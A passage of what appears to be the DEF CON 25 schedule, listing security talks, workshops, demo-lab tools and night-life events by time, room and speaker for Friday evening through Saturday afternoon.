DC - Track 1 - Cisco Catalyst Exploitation - Artem Kondratenko
DC - Track 2 - Panel: DEF CON Groups - Jeff Moss (Dark Tangent), Waz, Brent White (B1TKILL3R), Jayson E. Street, Grifter, Jun Li, S0ups, Major Malfunction
DC - Track 3 - MEATPISTOL, A Modular Malware Implant Framework - FuzzyNop (Josh Schwartz), ceyx (John Cramb)
DC - Track 4 - The Internet Already Knows I'm Pregnant - Cooper Quintin, Kashmir Hill
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - (17:40-18:30) - 101 hardware hacking workshop - Ken Munro @TheKenMunroShow
PHV - Milano VIII - Promenade Level - AWS Persistence and Lateral Movement Techniques - Peter Ewane
PHW - Neopolitan BR IV - Promenade Level - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Using phonetic algorithms to increase your search space and detect misspellings. - Alex Kahan
RCV - Palermo room, Promenade level - (17:25-17:59) - Attack Surface Discovery with Intrigue - Jcran
SEV - Emperors BR II - cont...(16:55-17:25) - Beyond Phishing - Building and Sustaining a Corporate SE Program - Fahey Owens
SEV - Emperors BR II - (17:30-18:20) - SE vs Predator: Using Social Engineering in ways I never thought… - Chris Hadnagy
SKY - Verona/Tuin/Trevi - Promenade Level - Child Abuse Material, Current Issues Trends & Technologies - @h0tdish and @mickmoran
VMHV - Roman 1, Promenade Level - Panel: Securing the Election Office: A Local Response to a Global Threat - Erik Kamerling, Tim Blute, Noah Praetz
WV - Florentine BR I & II - Promenade Level - Failsafe: Yet Another SimplySafe Attack Vector - Nick 'r@ndom' Delewski
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

Friday - 18:00

BHV - Pisa Room - tDCS workshop - Darren and Jen
CPV - Florentine Ballroom 4 - cont...(17:30-18:30) - Unfairplay (NOT RECORDED) - [anonymous panel]
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - cont...(17:40-18:30) - 101 hardware hacking workshop - Ken Munro @TheKenMunroShow
Night Life - Chillout Lounge, Roman 3, Promenade Level - "DCG" Mixer
Night Life - Lobby Bar - DEFCON 25 Meetup for /r/Defcon
PHV - Milano VIII - Promenade Level - Threat Intel for All: There's More to Your Data Than Meets the Eye - Cheryl Biswas
PHW - Neopolitan BR IV - Promenade Level - cont...(17:00-18:30) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Skip tracing for fun and profit - Rhett Greenhagen
SEV - Emperors BR II - cont...(17:30-18:20) - SE vs Predator: Using Social Engineering in ways I never thought… - Chris Hadnagy
SEV - Emperors BR II - (18:25-19:15) - Hackers gonna hack - But do they know why? - Helen Thackray
SKY - Verona/Tuin/Trevi - Promenade Level - Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study - Amit Elazari
WV - Florentine BR I & II - Promenade Level - Reverse Engineering DSSS Extended Cut - Michael Ossmann
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

Friday - 19:00

Night Life - Chillout Lounge, Roman 3, Promenade Level - cont...(18:00-20:00) - "DCG" Mixer
PHW - Neopolitan BR IV - Promenade Level - Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols - SensePost
SEV - Emperors BR II - cont...(18:25-19:15) - Hackers gonna hack - But do they know why? - Helen Thackray
SEV - Emperors BR II - (19:15-20:05) - Skills For A Red-Teamer - Brent White & Tim Roberts

Friday - 20:00

DC - Capri Room - Hacking Democracy - Mr. Sean Kanuck
DC - Modena - Horror stories of a translator and how a tweet can start a war with less than 140 characters - El Kentaro
DC - Trevi Room - Panel - An Evening with the EFF - Kurt Opsahl, Nate Cardozo, Eva Galperin, Shabid Buttar, Kit Walsh
Night Life - Roman 1, Promenade Level - Hacker Karaoke
Night Life - Track 2 - Hacker Jeopardy
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - Whose Slide is it anyway?
PHW - Neopolitan BR IV - Promenade Level - cont...(19:00-20:30) - Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols - SensePost
SEV - Emperors BR II - cont...(19:15-20:05) - Skills For A Red-Teamer - Brent White & Tim Roberts
SEV - Emperors BR II - (20:10-20:40) - Heavy Diving for Credentials: Towards an Anonymous Phishing - Yaiza Rubio & Felix Brezo

Friday - 21:00

DC - Capri Room - cont...(20:00-21:59) - Hacking Democracy - Mr. Sean Kanuck
DC - Modena - cont...(20:00-21:59) - Horror stories of a translator and how a tweet can start a war with less than 140 characters - El Kentaro
DC - Trevi Room - cont...(20:00-21:59) - Panel - An Evening with the EFF - Kurt Opsahl, Nate Cardozo, Eva Galperin, Shabid Buttar, Kit Walsh
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: Richard Cheese
Night Life - Track 2 - cont...(20:00-24:00) - Hacker Jeopardy
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
SEV - Emperors BR II - cont...(20:10-20:40) - Heavy Diving for Credentials: Towards an Anonymous Phishing - Yaiza Rubio & Felix Brezo

Friday - 22:00

Night Life - Modena, Promenade level - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - (22:30-27:00) - 303 Party - 303
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - cont...(21:00-22:30) - Official Entertainment: Richard Cheese
Night Life - Track 1 & Chillout lounges - (22:30-23:00) - Official Entertainment: DUALCORE
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
Night Life - Turin, Promenade Level - INFOSEC UNLOCKED - INFOSEC UNLOCKED

Friday - 23:00

IOT - Main Contest Area - (23:30-24:20) - IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship - Rick Ramgattie @RRamgattie
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: MC FRONTALOT
Night Life - Track 1 & Chillout lounges - (23:30-24:00) - Official Entertainment: YT CRACKER
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

Friday - 24:00

IOT - Main Contest Area - cont...(23:30-24:20) - IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship - Rick Ramgattie @RRamgattie
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: REEL BIG FISH
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

Friday - 25:00

Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - cont...(24:00-25:30) - Official Entertainment: REEL BIG FISH
Night Life - Track 1 & Chillout lounges - (25:30-26:00) - Official Entertainment: KRISZ KLINK
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

Friday - 26:00

Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

Saturday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.


Saturday - 10:00

BHV - Pisa Room - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
BHV - Pisa Room - (10:30-10:59) - Hacking the Second Genetic Code using Information Theory - Travis Lawrence
CPV - Florentine Ballroom 4 - (10:30-11:30) - The Surveillance Capitalism Will Continue Until Morale Improves - J0N J4RV1S
DC - Track 1 - Persisting with Microsoft Office: Abusing Extensibility Options - William Knowles
DC - Track 1 - (10:20-10:40) - Breaking Wind: Adventures in Hacking Wind Farm Control Networks - Jason Staggs
DC - Track 2 - $BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning? - Cory Doctorow
DC - Track 3 - Get-$pwnd: Attacking Battle-Hardened Windows Server - Lee Holmes
DC - Track 3 - (10:20-10:40) - WSUSpendu: How to hang WSUS clients - Romain Coltel, Yves Le Provost
DC - Track 4 - The spear to break the security wall of S7CommPlus - Cheng, Zhang Yunhai
DC - Track 4 - (10:20-10:40) - (Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging. - K2
DL - Table 1 - Fuzzapi - Abhijeth Dugginapeddi, Lalith Rallabhandi, Srinivas Rao
DL - Table 2 - GibberSense - Ajit Hatti
DL - Table 3 - Android Tamer - Anant Shrivastava
DL - Table 4 - WiFi Cactus - darkmatter
DL - Table 5 - Maltego "Have I been pwned?" - Christian Heinrich
DL - Table 6 - PIV OPACITY - Christopher Williams
ICS - Calibria - (10:30-10:59) - Dissecting industrial wireless implementations. - Blake Johnson
IOT - Main Contest Area - From DVR worms, to fridges, via dildos, the sins of the IoT in 50 minutes - Andrew Tierney @cybergibbons & Ken Munro @TheKenMunroShow
PHV - Milano VIII - Promenade Level - Make Your Own 802.11ac Monitoring Hacker Gadget - Vivek Ramachandran, Thomas d'Otreppe
PHW - Neopolitan BR IV - Promenade Level - The Kali Linux Dojo - Angela Could Have Done Better - Mati Aharoni
RCV - Palermo room, Promenade level - Burner Phone Challenge - Dakota Nelson
SKY - Verona/Tuin/Trevi - Promenade Level - Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways - John Ives
WS - Octavius 1 - (10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - (10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - (10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - (10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - (10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

Saturday - 11:00

BHV - Pisa Room - Biohackers Die - Jeffrey Tibbetts
BHV - Pisa Room - (11:30-11:59) - Microscopes are Stupid - Louis Auguste
CHV - Village Talks Outside Contest Area, Pool Level - GPS System Integrity - Vlad Gostomelsky
CPV - Florentine Ballroom 3 - WS: Implementing An Elliptic Curve in Go - George Tankersley
CPV - Florentine Ballroom 4 - cont...(10:30-11:30) - The Surveillance Capitalism Will Continue Until Morale Improves - J0N J4RV1S
CPV - Florentine Ballroom 4 - (11:30-12:00) - Privacy is Not An Add-On: Designing for Privacy from the Ground Up - Alisha Kloc
DC - Track 1 - Microservices and FaaS for Offensive Security - Ryan Baxendale
DC - Track 1 - (11:20-11:40) - Abusing Webhooks for Command and Control - Dimitry Snezhkov
DC - Track 2 - Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices - Joe FitzPatrick, Michael Leibowitz
DC - Track 3 - If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament - skud (Mark Williams), Sky (Rob Stanley)
DC - Track 4 - Evading next-gen AV using artificial intelligence - Hyrum Anderson
DC - Track 4 - (11:20-12:35) - All Your Things Are Belong To Us - Zenofex, 0x00string, CJ_000, Maximus64
DL - Table 1 - cont...(10:00-11:50) - Fuzzapi - Abhijeth Dugginapeddi, Lalith Rallabhandi, Srinivas Rao
DL - Table 2 - cont...(10:00-11:50) - GibberSense - Ajit Hatti
DL - Table 3 - cont...(10:00-11:50) - Android Tamer - Anant Shrivastava
DL - Table 4 - cont...(10:00-11:50) - WiFi Cactus - darkmatter
DL - Table 5 - cont...(10:00-11:50) - Maltego "Have I been pwned?" - Christian Heinrich
DL - Table 6 - cont...(10:00-11:50) - PIV OPACITY - Christopher Williams
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery
HHV - Village Talks Outside Contest Area, Pool Level - cont...(11:00-12:00) - Ardusploit - Proof of concept for Arduino code injection - Cesare Pizzi
ICS - ICS-Village - (11:30-11:59) - Using Alexa for your Control System environment - Tom Van Norman
PHV - Milano VIII - Promenade Level - The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots - Gabriel Ryan
PHW - Neopolitan BR IV - Promenade Level - cont...(10:00-11:59) - The Kali Linux Dojo - Angela Could Have Done Better - Mati Aharoni
RCV - Palermo room, Promenade level - cont...(10:00-11:59) - Burner Phone Challenge - Dakota Nelson
SKY - Verona/Tuin/Trevi - Promenade Level - Catch me leaking your data... if you can... - Mike Raggo & Chet Hosmer
WV - Florentine BR I & II - Promenade Level - (11:30-12:55) - SIGINT for the Rest of US - Matt Blaze
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

Saturday - 12:00

BillW - Office 4A on Promenade Level - Friends of Bill W
CHV - Village Talks Outside Contest Area, Pool Level - That’s no car. It’s a network! - Mitch Johnson
CPV - Florentine Ballroom 3 - cont...(11:00-12:30) - WS: Implementing An Elliptic Curve in Go - George Tankersley
CPV - Florentine Ballroom 3 - (12:30-13:30) - WS: Secrets Management in the Cloud - Evan Johnson
CPV - Florentine Ballroom 4 - Operational Security Lessons from the Dark Web - Shea Nangle
DC - Track 1 - Driving down the rabbit hole - Mickey Shkatov, Jesse Michael, Oleksandr Bazhaniuk
DC - Track 2 - When Privacy Goes Poof! Why It's Gone and Never Coming Back - Richard Thieme a.k.a. neuralcowboy
DC - Track 3 - DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent - Jim Nitterauer
DC - Track 4 - cont...(11:20-12:35) - All Your Things Are Belong To Us - Zenofex, 0x00string, CJ_000, Maximus64
DL - Table 1 - LAMMA 1.0 - Antriksh Shah, Ajit Hatti
DL - Table 2 - https://crack.sh/ - David Hulton, Ian Foster
DL - Table 3 - GreatFET - Dominic Spill, Michael Ossmann
DL - Table 4 - Ruler - Pivoting Through Exchange - Etienne Stalmans
DL - Table 5 - SamyKam - Salvador Mendoza
DL - Table 6 - Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization - Bryce Kunz @TweekFawkes, Nathan Bates (@Brutes_)
HHV - Village Talks Outside Contest Area, Pool Level - cont...(12:00-13:00) - What is Ground? (Baby don't hurt me) - Gigs Taggart
PHV - Milano VIII - Promenade Level - Fortune 100 InfoSec on a State Government Budget - Eric Capuano
PHW - Neopolitan BR IV - Promenade Level - (12:30-13:59) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Domain Discovery: Expanding your scope like a boss - Jason Haddix
SKY - Verona/Tuin/Trevi - Promenade Level - Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border - wendy
WV - Florentine BR I & II - Promenade Level - cont...(11:30-12:55) - SIGINT for the Rest of US - Matt Blaze
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

Saturday - 13:00

BHV - Pisa Room - DIYBioweapons and Regulation - Meow Ludo Meow Meow
BHV - Pisa Room - (13:30-13:59) - IoT of Dongs - RenderMan
CHV - Village Talks Outside Contest Area, Pool Level - Insecure By Law - Corey Theun
CPV - Florentine Ballroom 3 - cont...(12:30-13:30) - WS: Secrets Management in the Cloud - Evan Johnson
CPV - Florentine Ballroom 4 - The Symantec/Chrome SSL debacle - how to do this better... - Jake Williams
DC - Track 1 - Demystifying Windows Kernel Exploitation by Abusing GDI Objects. - 5A1F (Saif El-Sherei)
DC - Track 2 - Koadic C3 - Windows COM Command & Control Framework - Sean Dillon (zerosum0x0), Zach Harding (Aleph-Naught-)
DC - Track 3 - Twenty Years of MMORPG Hacking: Better Graphics, Same Exploits - Manfred (@_EBFE)
DC - Track 4 - A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego - Philip Tully, Michael T. Raggo
DL - Table 1 - cont...(12:00-13:50) - LAMMA 1.0 - Antriksh Shah, Ajit Hatti
DL - Table 2 - cont...(12:00-13:50) - https://crack.sh/ - David Hulton, Ian Foster
DL - Table 3 - cont...(12:00-13:50) - GreatFET - Dominic Spill, Michael Ossmann
DL - Table 4 - cont...(12:00-13:50) - Ruler - Pivoting Through Exchange - Etienne Stalmans
DL - Table 5 - cont...(12:00-13:50) - SamyKam - Salvador Mendoza
DL - Table 6 - cont...(12:00-13:50) - Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization - Bryce Kunz @TweekFawkes, Nathan Bates (@Brutes_)
HHV - Village Talks Outside Contest Area, Pool Level - cont...(13:00-14:00) - Hardware Hacking: Old Sk00l and New Sk00l - hwbxr
IOT - Main Contest Area - The Internet of Vulnerabilities - Deral Heiland @percent_x
PHV - Milano VIII - Promenade Level - YALDA – Large Scale Data Mining for Threat Intelligence - Gita Ziabari
PHW - Neopolitan BR IV - Promenade Level - cont...(12:30-13:59) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Recon and bug bounties what a great love story - Abhijeth
RCV - Palermo room, Promenade level - (13:25-13:59) - Using DFIR Orchestration and Automation Tools and Playbooks For OSINT and Recon - Tyler
SKY - Verona/Tuin/Trevi - Promenade Level - Trauma in Healthcare IT: My Differential Diagnosis and Call to Action - Audie
WV - Florentine BR I & II - Promenade Level - POCSAG Amateur Pager Network - Andrew 'r0d3nt' Strutt
WV - Florentine BR I & II - Promenade Level - (13:30-13:55) - Suitcase Repeater Build for UHF - 70cm - Andrew 'r0d3nt' Strutt
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

Saturday - 14:00

BHV - Pisa Room - Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode - Awesome Folks from Various BioHacking Podcasts
CPV - Florentine Ballroom 3 - WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL - Miguel Guirao
CPV - Florentine Ballroom 4 - Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship - Lauren Rucker
DC - Track 1 - Attacking Autonomic Networks - Omar Eissa
DC - Track 2 - Trojan-tolerant Hardware & Supply Chain Security in Practice - Vasilios Mavroudis, Dan Cvrcek
DC - Track 3 - Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles - p3n3troot0r (Duncan Woodbury), ginsback (Nicholas Haltmeyer)
DC - Track 4 - XenoScan: Scanning Memory Like a Boss - Nick Cano
DL - Table 1 - Mycroft - Joshua Montgomery
DL - Table 2 - bullDozer - Keith Lee
DL - Table 3 - CrackMapExec - Marcello Salvati
DL - Table 4 - Crypt-Keeper - Maurice Carey
DL - Table 5 - Bropy - Matt Domko
DL - Table 6 - Radare2 - Maxime Morin
ICS - Calibria - The gap in ICS Cyber security - Cyber security of Level 1 Field devices. - Joe Weiss
ICS - ICS-Village - (14:30-15:59) - ICS SCADA Forensics workshop/challenge - Joe Stirland and Kevin Jones
IOT - Main Contest Area - (14:40-15:30) - IIDS: An Intrusion Detection System for IoT - Vivek Ramachandran @securitytube, Nishant Sharma, and Ashish Bhangale
PHV - Milano VIII - Promenade Level - Past, Present and Future of High Speed Packet Filtering on Linux - Gilberto Bertin
PHV - Milano VIII - Promenade Level - (14:40-14:59) - Visual Network and File Forensics - Ankur Tyagi
PHW - Neopolitan BR IV - Promenade Level - (14:30-15:59) - Introduction to 802.11 Packet Dissection - Megumi Takeshita
RCV - Palermo room, Promenade level - Total Recoll: Conducting Investigations without Missing a Thing - Dakota Nelson
RCV - Palermo room, Promenade level - (14:50-15:15) - How to obtain 100 Facebook accounts per day through internet searches - Guillermo Buendia
SKY - Verona/Tuin/Trevi - Promenade Level - FERPA - Only Your Grades Are Safe; OSINT in Higher Education - Leah Figueroa/ Princess Leah
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 1 - (14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 4 - (14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 5 - (14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 6 - (14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith
WS - Octavius 7 - (14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

Saturday - 15:00

BHV - Pisa Room - Biotechnology Needs a Security Patch...Badly - Ed You
BHV - Pisa Room - (15:30-15:59) - Standardizing the Secure Deployment of Medical Devices - Chris Frenz
CHV - Village Talks Outside Contest Area, Pool Level - Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles - p3n3troot0r
CPV - Florentine Ballroom 3 - cont...(14:00-16:00) - WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL - Miguel Guirao
CPV - Florentine Ballroom 4 - Yet another password hashing talk - Evgeny Sidorov
CPV - Florentine Ballroom 4 - (15:30-16:00) - Core Illumination: Traffic Analysis in Cyberspace - Kenneth Geers
DC - Capri Room - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin, Representative Will Hurd
DC - Track 1 - MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) - Chris Thompson
DC - Track 2 - Tracking Spies in the Skies - Jason Hernandez, Sam Richards, Jerod MacDonald-Evoy
DC - Track 3 - DOOMed Point of Sale Systems - trixr4skids
DC - Track 4 - Digital Vengeance: Exploiting the Most Notorious C&C Toolkits - Professor Plum
DL - Table 1 - cont...(14:00-15:50) - Mycroft - Joshua Montgomery
DL - Table 2 - cont...(14:00-15:50) - bullDozer - Keith Lee
DL - Table 3 - cont...(14:00-15:50) - CrackMapExec - Marcello Salvati
DL - Table 4 - cont...(14:00-15:50) - Crypt-Keeper - Maurice Carey
DL - Table 5 - cont...(14:00-15:50) - Bropy - Matt Domko
DL - Table 6 - cont...(14:00-15:50) - Radare2 - Maxime Morin
HHV - Village Talks Outside Contest Area, Pool Level - cont...(15:00-16:00) - A Tangle of Plastic Spaghetti: A Look Into the Security of 3D Printers - John Dunlap
ICS - ICS-Village - cont...(14:30-15:59) - ICS SCADA Forensics workshop/challenge - Joe Stirland and Kevin Jones
IOT - Main Contest Area - cont...(14:40-15:30) - IIDS: An Intrusion Detection System for IoT - Vivek Ramachandran @securitytube, Nishant Sharma, and Ashish Bhangale
PHV - Milano VIII - Promenade Level - Modern Day CovertTCP with a Twist - Mike Raggo, Chet Hosmer
PHW - Neopolitan BR IV - Promenade Level - cont...(14:30-15:59) - Introduction to 802.11 Packet Dissection - Megumi Takeshita
RCV - Palermo room, Promenade level - cont...(14:50-15:15) - How to obtain 100 Facebook accounts per day through internet searches - Guillermo Buendia
RCV - Palermo room, Promenade level - (15:15-15:59) - OSINT Tactics on Source Code & Developers - Simon Roses
WV - Florentine BR I & II - Promenade Level - Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array - Alexander Zakharov
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

Saturday - 16:00

BHV - Pisa Room - Reversing Your Own Source Code - Cosmo Mielke
CHV - Village Talks Outside Contest Area, Pool Level - (16:30-17:30) - The Bicho: An Advanced Car Backdoor Maker - Sheila Ayelen Berta
CPV - Florentine Ballroom 4 - rustls: modern, fast, safer TLS - Joseph Birr-Pixton
DC - Capri Room - cont...(15:00-16:59) - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin, Representative Will Hurd
DC - Track 1 - Dealing the perfect hand - Shuffling memory blocks on z/OS - Ayoul3
DC - Track 2 - From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene - Inbar Raz, Eden Shochat
DC - Track 3 - CableTap: Wirelessly Tapping Your Home Network - Marc Newlin, Logan Lamb, Chris Grayson
DC - Track 4 - Game of Drones: Putting the Emerging "Drone Defense" Market to the Test - Francis Brown, David Latimer
DL - Table 1 - Advanced Spectrum Monitoring with ShinySDR - Michael Ossmann, Dominic Spill
DL - Table 2 - DNS-Exfil-Suite - Nolan Berry, Cory Schwartz
DL - Table 3 - CellAnalysis - Pedro Cabrera
DL - Table 4 - Universal Serial aBUSe - Rogan Dawes
DL - Table 5 - EAPHammer - Gabriel Ryan
DL - Table 6/Five - ShinoBOT Family - Sh1n0g1
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery
ICS - Calibria - Grid insecurity - and how to really fix this shit - Bryson Bort, Atlas
IOT - Main Contest Area - Redesigning PKI for IoT because Crypto is Hard - Brian Knopf @DoYouQA
PHV - Milano VIII - Promenade Level - Fooling the Hound: Deceiving Domain Admin Hunters - Tom Sela
PHW - Neopolitan BR IV - Promenade Level - (16:30-17:59) - Serious Intro to Python for Admins - David Potts
RCV - Palermo room, Promenade level - Intro to OSINT: Zero on the way to Hero - Joe Gray
SEV - Emperors BR II - The Human Factor: Why Are We So Bad at Security and Risk Assessment? - John Nye
SEV - Emperors BR II - (16:55-17:25) - Are you Killing your security program? - Michele Fincher
SKY - Verona/Tuin/Trevi - Promenade Level - Rockin' the (vox)Vote - algorythm
WV - Florentine BR I & II - Promenade Level - WIGLE Like You Mean It - Aardvark and Darkmatter
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
